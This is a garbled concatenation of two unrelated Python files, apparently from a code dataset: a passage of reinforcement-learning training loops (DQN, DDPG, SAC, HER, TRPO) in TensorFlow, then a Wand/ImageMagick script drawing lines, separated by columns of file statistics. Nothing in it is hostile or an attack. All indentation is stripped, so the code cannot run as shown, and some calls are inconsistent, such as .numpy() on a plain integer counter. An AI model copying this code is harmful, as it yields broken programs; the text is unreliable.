state = next_state
cnt_action.append(action_e)
# for evaluation purpose
if global_timestep.numpy() % agent.params.eval_interval == 0:
agent.eval_flg = True
if (global_timestep.numpy() > agent.params.learning_start) and (
global_timestep.numpy() % agent.params.train_interval == 0):
states, actions, rewards, next_states, dones, weights, indices = replay_buffer.sample(
agent.params.batch_size, Beta.get_value())
loss, batch_loss = agent.update(states, actions, rewards, next_states, dones)
# add noise to the priorities
batch_loss = np.abs(batch_loss) + agent.params.prioritized_replay_noise
# Update a prioritised replay buffer using a batch of losses associated with each timestep
replay_buffer.update_priorities(indices, batch_loss)
# synchronise the target and main models by hard or soft update
if (global_timestep.numpy() > agent.params.learning_start) and (
global_timestep.numpy() % agent.params.sync_freq == 0):
agent.manager.save()
agent.target_model.set_weights(agent.main_model.get_weights())
"""
===== After 1 Episode is Done =====
"""
tf.contrib.summary.scalar("reward", total_reward, step=global_timestep.numpy())
tf.contrib.summary.scalar("exec time", time.time() - start, step=global_timestep.numpy())
if i >= agent.params.reward_buffer_ep:
tf.contrib.summary.scalar("Moving Ave Reward", np.mean(reward_buffer), step=global_timestep.numpy())
tf.contrib.summary.histogram("taken actions", cnt_action, step=global_timestep.numpy())
# store the episode reward
reward_buffer.append(total_reward)
time_buffer.append(time.time() - start)
if global_timestep.numpy() > agent.params.learning_start and i % agent.params.reward_buffer_ep == 0:
log.logging(global_timestep.numpy(), i, np.sum(time_buffer), reward_buffer, np.mean(loss),
policy.current_epsilon(), cnt_action)
time_buffer = list()
if agent.eval_flg:
eval_Agent(agent, env)
agent.eval_flg = False
# check the stopping condition
if global_timestep.numpy() > agent.params.num_frames:
print("=== Training is Done ===")
eval_Agent(agent, env, n_trial=agent.params.test_episodes)
env.close()
break
def train_DQN_afp(agent, expert, env, agent_policy, expert_policy, replay_buffer, reward_buffer, params,
summary_writer):
"""
Training train_script for DQN and other advanced models without PER
:param agent:
:param env:
:param policy:
:param replay_buffer:
:param reward_buffer:
:param params:
:param summary_writer:
:return:
"""
get_ready(params)
with summary_writer.as_default():
# for summary purpose, we put all codes in this context
with tf.contrib.summary.always_record_summaries():
global_timestep = 0
for i in itertools.count():
state = env.reset()
total_reward = 0
start = time.time()
cnt_action = list()
agent_policy.index_episode = i
agent.index_episode = i
for t in itertools.count():
# env.render()
action = agent_policy.select_action(agent, state)
# where the AFP comes in
# if learning agent is not sure about his decision, then he asks for expert's help
if action <= 0.5:
action = expert_policy.select_action(expert, state)
next_state, reward, done, info = env.step(action)
replay_buffer.add(state, action, reward, next_state, done)
total_reward += reward
state = next_state
cnt_action.append(action)
global_timestep += 1
if (global_timestep > params.learning_start) and (global_timestep % params.train_interval == 0):
states, actions, rewards, next_states, dones = replay_buffer.sample(params.batch_size)
loss, batch_loss = agent.update(states, actions, rewards, next_states, dones)
# synchronise the target and main models by hard or soft update
if (global_timestep > params.learning_start) and (global_timestep % params.sync_freq == 0):
agent.manager.save()
if params.update_hard_or_soft == "hard":
agent.target_model.set_weights(agent.main_model.get_weights())
elif params.update_hard_or_soft == "soft":
soft_target_model_update_eager(agent.target_model, agent.main_model,
tau=params.soft_update_tau)
if done:
tf.contrib.summary.scalar("reward", total_reward, step=global_timestep.numpy())
# store the episode reward
reward_buffer.append(total_reward)
if global_timestep > params.learning_start:
try:
logging(global_timestep, params.num_frames, i, time.time() - start, total_reward,
np.mean(loss), 0, cnt_action)
except:
pass
break
# check the stopping condition
# if np.mean(reward_buffer) > params.goal or global_timestep.numpy() > params.num_frames:
if global_timestep.numpy() > params.num_frames:
print("GAME OVER!!")
env.close()
break
def train_DRQN(agent, env, policy, replay_buffer, reward_buffer, params, summary_writer):
"""
Training train_script for DQN and other advanced models without PER
:param agent:
:param env:
:param policy:
:param replay_buffer:
:param reward_buffer:
:param params:
:param summary_writer:
:return:
"""
get_ready(params)
with summary_writer.as_default():
# for summary purpose, we put all codes in this context
with tf.contrib.summary.always_record_summaries():
global_timestep = 0
for i in itertools.count():
state = env.reset()
total_reward = 0
start = time.time()
cnt_action = list()
policy.index_episode = i
agent.index_episode = i
episode_memory = list()
for t in itertools.count():
# env.render()
action = policy.select_action(agent, state.reshape(1, 4))
next_state, reward, done, info = env.step(action)
episode_memory.append((state, action, reward, next_state, done))
total_reward += reward
state = next_state
cnt_action.append(action)
global_timestep += 1
if global_timestep > params.learning_start:
states, actions, rewards, next_states, dones = replay_buffer.sample(params.batch_size)
_states, _actions, _rewards, _next_states, _dones = [], [], [], [], []
for index, data in enumerate(zip(states, actions, rewards, next_states, dones)):
s1, a, r, s2, d = data
ep_start = np.random.randint(0, len(s1) + 1 - 4)
# states[i] = s1[ep_start:ep_start+4, :]
# actions[i] = a[ep_start:ep_start+4]
# rewards[i] = r[ep_start:ep_start+4]
# next_states[i] = s2[ep_start:ep_start+4, :]
# dones[i] = d[ep_start:ep_start+4]
_states.append(s1[ep_start:ep_start + 4, :])
_actions.append(a[ep_start:ep_start + 4])
_rewards.append(r[ep_start:ep_start + 4])
_next_states.append(s2[ep_start:ep_start + 4, :])
_dones.append(d[ep_start:ep_start + 4])
_states, _actions, _rewards, _next_states, _dones = np.array(_states), np.array(
_actions), np.array(_rewards), np.array(_next_states), np.array(_dones)
# loss, batch_loss = agent.update(states, actions, rewards, next_states, dones)
loss, batch_loss = agent.update(_states, _actions, _rewards, _next_states, _dones)
logging(global_timestep, params.num_frames, i, time.time() - start, total_reward, np.mean(loss),
policy.current_epsilon(), cnt_action)
if np.random.rand() > 0.5:
agent.manager.save()
if params.update_hard_or_soft == "hard":
agent.target_model.set_weights(agent.main_model.get_weights())
elif params.update_hard_or_soft == "soft":
soft_target_model_update_eager(agent.target_model, agent.main_model,
tau=params.soft_update_tau)
if done:
tf.contrib.summary.scalar("reward", total_reward, step=global_timestep)
reward_buffer.append(total_reward)
s1, a, r, s2, d = [], [], [], [], []
for data in episode_memory:
s1.append(data[0])
a.append(data[1])
r.append(data[2])
s2.append(data[3])
d.append(data[4])
replay_buffer.add(s1, a, r, s2, d)
break
# check the stopping condition
if np.mean(reward_buffer) > params.goal:
print("GAME OVER!!")
env.close()
break
"""
===== Policy Gradient Algorithm =====
"""
def train_DDPG_original(agent, env, replay_buffer, reward_buffer, summary_writer):
get_ready(agent.params)
global_timestep = tf.compat.v1.train.get_or_create_global_step()
time_buffer = deque(maxlen=agent.params.reward_buffer_ep)
log = logger(agent.params)
action_buffer, distance_buffer, eval_epochs = list(), list(), list()
with summary_writer.as_default():
# for summary purpose, we put all codes in this context
with tf.contrib.summary.always_record_summaries():
for i in itertools.count():
state = env.reset()
total_reward = 0
start = time.time()
agent.random_process.reset_states()
done = False
episode_len = 0
while not done:
if global_timestep.numpy() < agent.params.learning_start:
action = env.action_space.sample()
else:
action = agent.predict(state)
# scale for execution in env (in DDPG, every action is clipped between [-1, 1] in agent.predict)
next_state, reward, done, info = env.step(action * env.action_space.high)
replay_buffer.add(state, action, reward, next_state, done)
"""
=== Update the models
"""
if global_timestep.numpy() > agent.params.learning_start:
states, actions, rewards, next_states, dones = replay_buffer.sample(agent.params.batch_size)
loss = agent.update(states, actions, rewards, next_states, dones)
soft_target_model_update_eager(agent.target_actor, agent.actor, tau=agent.params.soft_update_tau)
soft_target_model_update_eager(agent.target_critic, agent.critic, tau=agent.params.soft_update_tau)
global_timestep.assign_add(1)
episode_len += 1
total_reward += reward
state = next_state
# for evaluation purpose
if global_timestep.numpy() % agent.params.eval_interval == 0:
agent.eval_flg = True
"""
===== After 1 Episode is Done =====
"""
# save the updated models
agent.actor_manager.save()
agent.critic_manager.save()
# store the episode related variables
reward_buffer.append(total_reward)
time_buffer.append(time.time() - start)
# logging on Tensorboard
if global_timestep.numpy() > agent.params.learning_start:
tf.contrib.summary.scalar("reward", total_reward, step=global_timestep.numpy())
tf.contrib.summary.scalar("loss", loss, step=global_timestep.numpy())
tf.contrib.summary.scalar("exec time", time.time() - start, step=global_timestep.numpy())
if i >= agent.params.reward_buffer_ep:
tf.contrib.summary.scalar("Moving Ave Reward", np.mean(reward_buffer), step=global_timestep.numpy())
# logging
if global_timestep.numpy() > agent.params.learning_start and i % agent.params.reward_buffer_ep == 0:
log.logging(global_timestep.numpy(), i, np.sum(time_buffer), reward_buffer, np.mean(loss), 0, [0])
# evaluation
if agent.eval_flg:
eval_reward, eval_distance, eval_action = eval_Agent_DDPG(env, agent)
eval_epochs.append(global_timestep.numpy())
action_buffer.append(eval_action)
distance_buffer.append(eval_distance)
agent.eval_flg = False
# check the stopping condition
if global_timestep.numpy() > agent.params.num_frames:
print("=== Training is Done ===")
eval_reward, eval_distance, eval_action = eval_Agent_DDPG(env, agent)
eval_epochs.append(global_timestep.numpy())
action_buffer.append(eval_action)
distance_buffer.append(eval_distance)
visualise_act_and_dist(np.array(eval_epochs), np.array(action_buffer), np.array(distance_buffer),
env_name=agent.params.env_name, file_dir=agent.params.plot_path)
env.close()
break
def train_DDPG_onpolicy(agent, env, replay_buffer, reward_buffer, summary_writer):
""" the cycle of updating the model is the off-policy, we use the updated policy after the previous episode """
get_ready(agent.params)
global_timestep = tf.compat.v1.train.get_or_create_global_step()
time_buffer = deque(maxlen=agent.params.reward_buffer_ep)
log = logger(agent.params)
action_buffer, distance_buffer, eval_epochs = list(), list(), list()
with summary_writer.as_default():
# for summary purpose, we put all codes in this context
with tf.contrib.summary.always_record_summaries():
for i in itertools.count():
state = env.reset()
total_reward = 0
start = time.time()
agent.random_process.reset_states()
done = False
episode_len = 0
# we refresh the replay_buffer at every episode
replay_buffer.refresh()
while not done:
if global_timestep.numpy() < agent.params.learning_start:
action = env.action_space.sample()
else:
action = agent.predict(state)
# scale for execution in env (in DDPG, every action is clipped between [-1, 1] in agent.predict)
next_state, reward, done, info = env.step(action * env.action_space.high)
replay_buffer.add(state, action, reward, next_state, done)
global_timestep.assign_add(1)
episode_len += 1
total_reward += reward
state = next_state
# for evaluation purpose
if global_timestep.numpy() % agent.params.eval_interval == 0:
agent.eval_flg = True
"""
===== After 1 Episode is Done =====
"""
# We have to be careful about the amount of minibatch size
batch_size = np.minimum(len(replay_buffer)-1, agent.params.batch_size)
# train the model at this point
for t_train in range(int(episode_len)):
# for t_train in range(10): # for test purpose
states, actions, rewards, next_states, dones = replay_buffer.sample(batch_size)
loss = agent.update(states, actions, rewards, next_states, dones)
soft_target_model_update_eager(agent.target_actor, agent.actor, tau=agent.params.soft_update_tau)
soft_target_model_update_eager(agent.target_critic, agent.critic, tau=agent.params.soft_update_tau)
# save the updated models
agent.actor_manager.save()
agent.critic_manager.save()
# store the episode related variables
reward_buffer.append(total_reward)
time_buffer.append(time.time() - start)
# logging on Tensorboard
if global_timestep.numpy() > agent.params.learning_start:
tf.contrib.summary.scalar("reward", total_reward, step=global_timestep.numpy())
tf.contrib.summary.scalar("loss", loss, step=global_timestep.numpy())
tf.contrib.summary.scalar("exec time", time.time() - start, step=global_timestep.numpy())
if i >= agent.params.reward_buffer_ep:
tf.contrib.summary.scalar("Moving Ave Reward", np.mean(reward_buffer), step=global_timestep.numpy())
# logging
if global_timestep.numpy() > agent.params.learning_start and i % agent.params.reward_buffer_ep == 0:
log.logging(global_timestep.numpy(), i, np.sum(time_buffer), reward_buffer, np.mean(loss), 0, [0])
# evaluation
if agent.eval_flg:
eval_reward, eval_distance, eval_action = eval_Agent_DDPG(env, agent)
eval_epochs.append(global_timestep.numpy())
action_buffer.append(eval_action)
distance_buffer.append(eval_distance)
agent.eval_flg = False
# check the stopping condition
if global_timestep.numpy() > agent.params.num_frames:
print("=== Training is Done ===")
eval_reward, eval_distance, eval_action = eval_Agent_DDPG(env, agent)
eval_epochs.append(global_timestep.numpy())
action_buffer.append(eval_action)
distance_buffer.append(eval_distance)
visualise_act_and_dist(np.array(eval_epochs), np.array(action_buffer), np.array(distance_buffer),
env_name=agent.params.env_name, file_dir=agent.params.plot_path)
env.close()
break
def train_SAC(agent, env, replay_buffer, reward_buffer, summary_writer):
get_ready(agent.params)
global_timestep = tf.compat.v1.train.get_or_create_global_step()
time_buffer = deque(maxlen=agent.params.reward_buffer_ep)
log = logger(agent.params)
action_buffer, distance_buffer, eval_epochs = list(), list(), list()
with summary_writer.as_default():
# for summary purpose, we put all codes in this context
with tf.contrib.summary.always_record_summaries():
for i in itertools.count():
state = env.reset()
total_reward = 0
start = time.time()
done = False
episode_len = 0
while not done:
if global_timestep.numpy() < agent.params.learning_start:
action = env.action_space.sample()
else:
action = agent.predict(state)
next_state, reward, done, info = env.step(action)
replay_buffer.add(state, action, reward, next_state, done)
global_timestep.assign_add(1)
episode_len += 1
total_reward += reward
state = next_state
# for evaluation purpose
if global_timestep.numpy() % agent.params.eval_interval == 0:
agent.eval_flg = True
"""
=== Update the models
"""
if global_timestep.numpy() > agent.params.learning_start:
states, actions, rewards, next_states, dones = replay_buffer.sample(agent.params.batch_size)
loss = agent.update(states, actions, rewards, next_states, dones)
soft_target_model_update_eager(agent.target_critic, agent.critic, tau=agent.params.soft_update_tau)
"""
===== After 1 Episode is Done =====
"""
# save the updated models
agent.actor_manager.save()
agent.critic_manager.save()
# store the episode related variables
reward_buffer.append(total_reward)
time_buffer.append(time.time() - start)
# logging on Tensorboard
tf.contrib.summary.scalar("reward", total_reward, step=global_timestep.numpy())
tf.contrib.summary.scalar("exec time", time.time() - start, step=global_timestep.numpy())
if i >= agent.params.reward_buffer_ep:
tf.contrib.summary.scalar("Moving Ave Reward", np.mean(reward_buffer), step=global_timestep.numpy())
# we log the training progress once in a `reward_buffer_ep` time
if global_timestep.numpy() > agent.params.learning_start and i % agent.params.reward_buffer_ep == 0:
log.logging(global_timestep.numpy(), i, time.time() - start, reward_buffer, np.mean(loss), 0, [0])
# evaluation
if agent.eval_flg:
eval_reward, eval_distance, eval_action = eval_Agent_DDPG(env, agent)
eval_epochs.append(global_timestep.numpy())
action_buffer.append(eval_action)
distance_buffer.append(eval_distance)
agent.eval_flg = False
# check the stopping condition
if global_timestep.numpy() > agent.params.num_frames:
print("=== Training is Done ===")
eval_reward, eval_distance, eval_action = eval_Agent_DDPG(env, agent)
eval_epochs.append(global_timestep.numpy())
action_buffer.append(eval_action)
distance_buffer.append(eval_distance)
visualise_act_and_dist(np.array(eval_epochs), np.array(action_buffer), np.array(distance_buffer),
env_name=agent.params.env_name, file_dir=agent.params.plot_path)
env.close()
break
# design pattern follows this repo: https://github.com/TianhongDai/hindsight-experience-replay
def train_HER(agent, env, replay_buffer, summary_writer):
get_ready(agent.params)
global_timestep = tf.compat.v1.train.get_global_step()
total_ep = 0
with summary_writer.as_default():
# for summary purpose, we put all codes in this context
with tf.contrib.summary.always_record_summaries():
for epoch in range(agent.params.num_epochs):
successes = list()
for cycle in range(agent.params.num_cycles):
mb_obs, mb_ag, mb_g, mb_actions = [], [], [], []
for ep in range(agent.params.num_episodes):
state = env.reset()
# obs, achieved_goal, desired_goal in `numpy.ndarray`
obs, ag, dg, rg = state_unpacker(state)
ep_obs, ep_ag, ep_g, ep_actions = [], [], [], []
success = list()
for ts in range(agent.params.num_steps):
# env.render()
action = agent.predict(obs, dg)
action = action_postprocessing(action, agent.params)
next_state, _, _, info = env.step(action)
# obs, achieved_goal, desired_goal in `numpy.ndarray`
next_obs, next_ag, next_dg, next_rg = state_unpacker(next_state)
ep_obs.append(obs.copy())
ep_ag.append(ag.copy())
ep_g.append(dg.copy())
ep_actions.append(action.copy())
global_timestep.assign_add(1)
success.append(info.get('is_success'))
obs = next_obs
# rg = next_rg
ag = next_ag
"""
=== After 1 ep ===
"""
ep_obs.append(obs.copy())
ep_ag.append(ag.copy())
mb_obs.append(ep_obs)
mb_ag.append(ep_ag)
mb_g.append(ep_g)
mb_actions.append(ep_actions)
successes.append(success)
total_ep += ep
tf.contrib.summary.scalar("Train Success Rate", np.mean(success), step=total_ep)
"""
=== After num_episodes ===
"""
# convert them into arrays
mb_obs = np.array(mb_obs)
mb_ag = np.array(mb_ag)
mb_g = np.array(mb_g)
mb_actions = np.array(mb_actions)
replay_buffer.store_episode([mb_obs, mb_ag, mb_g, mb_actions])
# ==== update normaliser ====
mb_obs_next = mb_obs[:, 1:, :]
mb_ag_next = mb_ag[:, 1:, :]
# get the number of normalization transitions
num_transitions = mb_actions.shape[1]
# create the new buffer to store them
buffer_temp = {'obs': mb_obs,
'ag': mb_ag,
'g': mb_g,
'actions': mb_actions,
'obs_next': mb_obs_next,
'ag_next': mb_ag_next,
}
transitions = replay_buffer.sample_func(buffer_temp, num_transitions)
# update
agent.o_norm.update(transitions['obs'])
agent.g_norm.update(transitions['g'])
# ==== finish update normaliser ====
# Update Loop
for _ in range(agent.params.num_updates):
transitions = replay_buffer.sample(agent.params.batch_size)
agent.update(transitions)
# sync networks
soft_target_model_update_eager(agent.target_actor, agent.actor, tau=agent.params.tau)
soft_target_model_update_eager(agent.target_critic, agent.critic, tau=agent.params.tau)
"""
=== After 1 epoch ===
"""
# each epoch, we test the agent
success_rate = eval_Agent_HER(agent, env, n_trial=agent.params.test_episodes)
tf.contrib.summary.scalar("Test Success Rate", success_rate, step=epoch)
print("Epoch: {:03d}/{} | Train Success Rate: {:.3f} | Test Success Rate: {:.3f}".format(
epoch, agent.params.num_epochs, np.mean(np.array(successes)), success_rate
))
print("=== Training is Done ===")
eval_Agent_HER(agent, env, n_trial=agent.params.test_episodes)
env.close()
# in this algo, since the order of occurrence is important so that
# we don't use Experience Replay to randomly sample trajectory
def train_TRPO(agent, env, reward_buffer, summary_writer):
get_ready(agent.params)
global_timestep = tf.compat.v1.train.get_global_step()
time_buffer = deque(maxlen=agent.params.reward_buffer_ep)
log = logger(agent.params)
init_state = env.reset()
normaliser = RunningMeanStd(init_state.shape[0])
total_ep = 0
# init_normaliser(env, normaliser) # init normaliser's moments by going through some episodes before training
with summary_writer.as_default():
# for summary purpose, we put all codes in this context
with tf.contrib.summary.always_record_summaries():
while global_timestep < agent.params.num_frames:
states, actions, rewards, = [], [], []
for _ in range(agent.params.num_rollout):
state = env.reset()
normaliser.normalise(state)
total_reward = 0
start = time.time()
done = False
while not done:
# env.render()
action = agent.predict(state)
next_state, reward, done, info = env.step(action)
next_state = normaliser.normalise(next_state)
states.append(state)
actions.append(action)
# rewards.append(reward*0.0025) # reward scaling
rewards.append(reward) # reward scaling
global_timestep.assign_add(1)
total_reward += reward
state = next_state
"""
===== After 1 Episode =====
"""
total_ep += 1
reward_buffer.append(total_reward)
time_buffer.append(time.time() - start)
normaliser.update(np.array(states))
tf.contrib.summary.scalar("reward", total_reward, step=total_ep)
tf.contrib.summary.scalar("exec time", time.time() - start, step=total_ep)
tf.contrib.summary.scalar("Moving Ave Reward", np.mean(reward_buffer), step=total_ep)
"""
===== After Rolling out of episodes is Done =====
"""
# update the weights: inside it's got a for-loop and a stopping condition
# so that if the value of KL-divergence exceeds some threshold, then we stop updating.
loss = agent.update(states, actions, rewards)
log.logging(global_timestep.numpy(), total_ep, np.sum(time_buffer), reward_buffer, np.mean(loss), 0,
[0])
eval_Agent_TRPO(agent, env)
# check the stopping condition
if global_timestep.numpy() > agent.params.num_frames:
print("=== Training is Done ===")
eval_Agent_TRPO(agent, env, n_trial=agent.params.test_episodes)
env.close()
break
"""
Distributed Version of Training APIs
"""
# import ray
#
#
# def train_HER_ray(agent, env, replay_buffer, summary_writer):
# ray.init()
# get_ready(agent.params)
# global_timestep = tf.compat.v1.train.get_global_step()
# total_ep = 0
#
# with summary_writer.as_default():
# # for summary purpose, we put all codes in this context
# with tf.contrib.summary.always_record_summaries():
#
# for epoch in range(agent.params.num_epochs):
# successes = list()
# for cycle in range(agent.params.num_cycles):
# mb_obs, mb_ag, mb_g, mb_actions = [], [], [], []
# # for ep in range(agent.params.num_episodes):
# agent_id = ray.put(agent)
# env_id = ray.put(env)
# tasks = [_inner_train_HER.remote(agent_id, env_id) for _ in range(agent.params.num_episodes)]
#
# res = ray.get(tasks)
# print(res)
# # asdf
#
# """
# === After num_episodes ===
# """
# # convert them into arrays
# mb_obs = np.array(mb_obs)
# mb_ag = np.array(mb_ag)
# mb_g = np.array(mb_g)
# mb_actions = np.array(mb_actions)
# replay_buffer.store_episode([mb_obs, mb_ag, mb_g, mb_actions])
#
# # ==== update normaliser ====
# mb_obs_next = mb_obs[:, 1:, :]
# mb_ag_next = mb_ag[:, 1:, :]
# # get the number of normalization transitions
# num_transitions = mb_actions.shape[1]
# # create the new buffer to store them
# buffer_temp = {'obs': mb_obs,
# 'ag': mb_ag,
# 'g': mb_g,
# 'actions': mb_actions,
# 'obs_next': mb_obs_next,
# 'ag_next': mb_ag_next,
# }
# transitions = replay_buffer.sample_func(buffer_temp, num_transitions)
# # update
# agent.o_norm.update(transitions['obs'])
# agent.g_norm.update(transitions['g'])
# # ==== finish update normaliser ====
#
# # Update Loop
# for _ in range(agent.params.num_updates):
# transitions = replay_buffer.sample(agent.params.batch_size)
# agent.update(transitions)
#
# # sync networks
# soft_target_model_update_eager(agent.target_actor, agent.actor, tau=agent.params.tau)
# soft_target_model_update_eager(agent.target_critic, agent.critic, tau=agent.params.tau)
#
# """
# === After 1 epoch ===
# """
# # each epoch, we test the agent
# success_rate = eval_Agent_HER(agent, env, n_trial=agent.params.test_episodes)
# tf.contrib.summary.scalar("Test Success Rate", success_rate, step=epoch)
#
# print("Epoch: {:03d}/{} | Train Success Rate: {:.3f} | Test Success Rate: {:.3f}".format(
# epoch, agent.params.num_epochs, np.mean(np.array(successes)), success_rate
# ))
#
# print("=== Training is Done ===")
# eval_Agent_HER(agent, env, n_trial=agent.params.test_episodes)
# env.close()
#
#
# @ray.remote
# def _inner_train_HER(agent, env):
# successes, mb_obs, mb_ag, mb_g, mb_actions = [], [], [], [], []
# state = env.reset()
# # obs, achieved_goal, desired_goal in `numpy.ndarray`
# obs, ag, dg, rg = state_unpacker(state)
# ep_obs, ep_ag, ep_g, ep_actions = [], [], [], []
# success = list()
# for ts in range(agent.params.num_steps):
# # env.render()
# action = agent.predict(obs, dg)
# action = action_postprocessing(action, agent.params)
#
# next_state, _, _, info = env.step(action)
#
# # obs, achieved_goal, desired_goal in `numpy.ndarray`
# next_obs, next_ag, next_dg, next_rg = state_unpacker(next_state)
#
# ep_obs.append(obs.copy())
# ep_ag.append(ag.copy())
# ep_g.append(dg.copy())
# ep_actions.append(action.copy())
#
# success.append(info.get('is_success'))
# obs = next_obs
# # rg = next_rg
# ag = next_ag
#
# """
# === After 1 ep ===
# """
# ep_obs.append(obs.copy())
# ep_ag.append(ag.copy())
# mb_obs.append(ep_obs)
# mb_ag.append(ep_ag)
# mb_g.append(ep_g)
# mb_actions.append(ep_actions)
# successes.append(success)
# return successes, mb_obs, mb_ag, mb_g, mb_actions
| 45.755769
| 153
| 0.534422
| 5,078
| 47,586
| 4.785939
| 0.072273
| 0.054314
| 0.060198
| 0.037526
| 0.893799
| 0.882813
| 0.864297
| 0.852487
| 0.836728
| 0.826688
| 0
| 0.005149
| 0.371496
| 47,586
| 1,039
| 154
| 45.799808
| 0.807443
| 0.202686
| 0
| 0.741071
| 0
| 0.001786
| 0.01829
| 0
| 0
| 0
| 0
| 0.000962
| 0
| 1
| 0.017857
| false
| 0.001786
| 0.007143
| 0
| 0.025
| 0.019643
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5461d67f5ab1a585d8629ba1bbc80224d5b5498a
| 6,476
|
py
|
Python
|
examples/drawing/sample16_line.py
|
chromia/wandplus
|
815127aeee85dbac3bc8fca35971d2153b1898a9
|
[
"ImageMagick",
"MIT"
] | null | null | null |
examples/drawing/sample16_line.py
|
chromia/wandplus
|
815127aeee85dbac3bc8fca35971d2153b1898a9
|
[
"ImageMagick",
"MIT"
] | null | null | null |
examples/drawing/sample16_line.py
|
chromia/wandplus
|
815127aeee85dbac3bc8fca35971d2153b1898a9
|
[
"ImageMagick",
"MIT"
] | null | null | null |
#!/usr/bin/env python
from wand.image import Image
from wand.drawing import Drawing
from wand.color import Color
# http://www.imagemagick.org/Usage/draw/#strokewidth
# original imagemagick command:
# convert -size 100x40 xc:lightblue \
# -draw "line 5,35 95,5" \
# line_default.jpg
with Image(width=100, height=40, background=Color('lightblue')) as img:
with Drawing() as draw:
draw.line((5, 35), (95, 5))
draw(img)
img.save(filename='sample16a.png')
# convert -size 100x40 xc:lightblue \
# -fill white -draw "line 5,35 95,5" \
# line.jpg
with Image(width=100, height=40, background=Color('lightblue')) as img:
with Drawing() as draw:
draw.fill_color = Color('white')
draw.line((5, 35), (95, 5))
draw(img)
img.save(filename='sample16b.png')
# convert -size 100x40 xc:lightblue \
# -fill white -stroke black -draw "line 5,35 95,5" \
# line_stroke.jpg
with Image(width=100, height=40, background=Color('lightblue')) as img:
with Drawing() as draw:
draw.fill_color = Color('white')
draw.stroke_color = Color('black')
draw.line((5, 35), (95, 5))
draw(img)
img.save(filename='sample16c.png')
# convert -size 100x40 xc:lightblue \
# -fill white -strokewidth 3 -draw "line 5,35 95,5" \
# line_fill_3.jpg
with Image(width=100, height=40, background=Color('lightblue')) as img:
with Drawing() as draw:
draw.fill_color = Color('white')
# draw.stroke_color = Color('black')
draw.stroke_width = 3
draw.line((5, 35), (95, 5))
draw(img)
img.save(filename='sample16d.png')
# convert -size 100x40 xc:lightblue \
# -stroke black -strokewidth 3 -draw "line 5,35 95,5" \
# line_stroke_3.jpg
with Image(width=100, height=40, background=Color('lightblue')) as img:
with Drawing() as draw:
# draw.fill_color = Color('white')
draw.stroke_color = Color('black')
draw.stroke_width = 3
draw.line((5, 35), (95, 5))
draw(img)
img.save(filename='sample16e.png')
# convert -size 100x40 xc:lightblue \
# -stroke black -strokewidth 1 -draw "line 5,35 95,5" \
# line_stroke_1.jpg
with Image(width=100, height=40, background=Color('lightblue')) as img:
with Drawing() as draw:
draw.stroke_color = Color('black')
draw.stroke_width = 1
draw.line((5, 35), (95, 5))
draw(img)
img.save(filename='sample16f.png')
# convert -size 100x40 xc:lightblue \
# -stroke black -strokewidth 5 -draw "line 5,35 95,5" \
# -stroke white -strokewidth 2 -draw "line 5,35 95,5" \
# line_multi.jpg
with Image(width=100, height=40, background=Color('lightblue')) as img:
with Drawing() as draw:
draw.stroke_color = Color('black')
draw.stroke_width = 5
draw.line((5, 35), (95, 5))
draw.stroke_color = Color('white')
draw.stroke_width = 2
draw.line((5, 35), (95, 5))
draw(img)
img.save(filename='sample16g.png')
# convert -size 100x40 xc:lightblue \
# -fill white -stroke black -strokewidth 0 -draw "line 5,35 95,5" \
# line_stroke_0.jpg
#
with Image(width=100, height=40, background=Color('lightblue')) as img:
with Drawing() as draw:
draw.fill_color = Color('white')
draw.stroke_color = Color('black')
draw.stroke_width = 0
draw.line((5, 35), (95, 5))
draw(img)
img.save(filename='sample16h.png')
# convert -size 25x10 xc:lightblue \
# -fill white -stroke black -strokewidth 0 -draw "line 2,8 22,1" \
# -scale 400% line_stroke_0_white.jpg
with Image(width=25, height=10, background=Color('lightblue')) as img:
with Drawing() as draw:
draw.fill_color = Color('white')
draw.stroke_color = Color('black')
draw.stroke_width = 0
draw.line((2, 8), (22, 1))
draw(img)
img.resize(100, 40, 'point')
img.save(filename='sample16i.png')
# convert -size 100x40 xc:lightblue \
# -fill white -stroke black -strokewidth 0 -draw "line 5,20 95,20" \
# line_stroke_horz.jpg
with Image(width=100, height=40, background=Color('lightblue')) as img:
with Drawing() as draw:
draw.fill_color = Color('white')
draw.stroke_color = Color('black')
draw.stroke_width = 0
draw.line((5, 20), (95, 20))
draw(img)
img.save(filename='sample16j.png')
# convert -size 25x10 xc:lightblue \
# -fill none -stroke black -strokewidth 0 -draw "line 2,8 22,1" \
# -scale 400% line_stroke_0_none.jpg
with Image(width=25, height=10, background=Color('lightblue')) as img:
with Drawing() as draw:
draw.fill_color = Color('none')
draw.stroke_color = Color('black')
draw.stroke_width = 0
draw.line((2, 8), (22, 1))
draw(img)
img.resize(100, 40, 'point')
img.save(filename='sample16k.png')
# convert -size 25x10 xc:lightblue \
# -fill red -stroke black -strokewidth 0 -draw "line 2,8 22,1" \
# -scale 400% line_stroke_0_none.jpg
with Image(width=25, height=10, background=Color('lightblue')) as img:
with Drawing() as draw:
draw.fill_color = Color('red')
draw.stroke_color = Color('black')
draw.stroke_width = 0
draw.line((2, 8), (22, 1))
draw(img)
img.resize(100, 40, 'point')
img.save(filename='sample16l.png')
# convert -size 25x10 xc:lightblue \
# -fill black -stroke black -strokewidth 0 -draw "line 2,8 22,1" \
# -scale 400% line_stroke_0_none.jpg
with Image(width=25, height=10, background=Color('lightblue')) as img:
with Drawing() as draw:
draw.fill_color = Color('black')
draw.stroke_color = Color('black')
draw.stroke_width = 0
draw.line((2, 8), (22, 1))
draw(img)
img.resize(100, 40, 'point')
img.save(filename='sample16m.png')
# convert -size 25x10 xc:lightblue \
# -fill black -stroke none -draw "line 2,8 22,1" \
# -scale 400% line_stroke_-_black.jpg
with Image(width=25, height=10, background=Color('lightblue')) as img:
with Drawing() as draw:
draw.fill_color = Color('black')
draw.stroke_color = Color('none')
draw.stroke_width = 0
draw.line((2, 8), (22, 1))
draw(img)
img.resize(100, 40, 'point')
img.save(filename='sample16n.png')
| 33.729167
| 76
| 0.609172
| 911
| 6,476
| 4.260154
| 0.084523
| 0.06184
| 0.04638
| 0.051018
| 0.903118
| 0.881732
| 0.881732
| 0.832517
| 0.794125
| 0.718887
| 0
| 0.082004
| 0.244904
| 6,476
| 191
| 77
| 33.905759
| 0.711656
| 0.31887
| 0
| 0.778761
| 0
| 0
| 0.100665
| 0
| 0
| 0
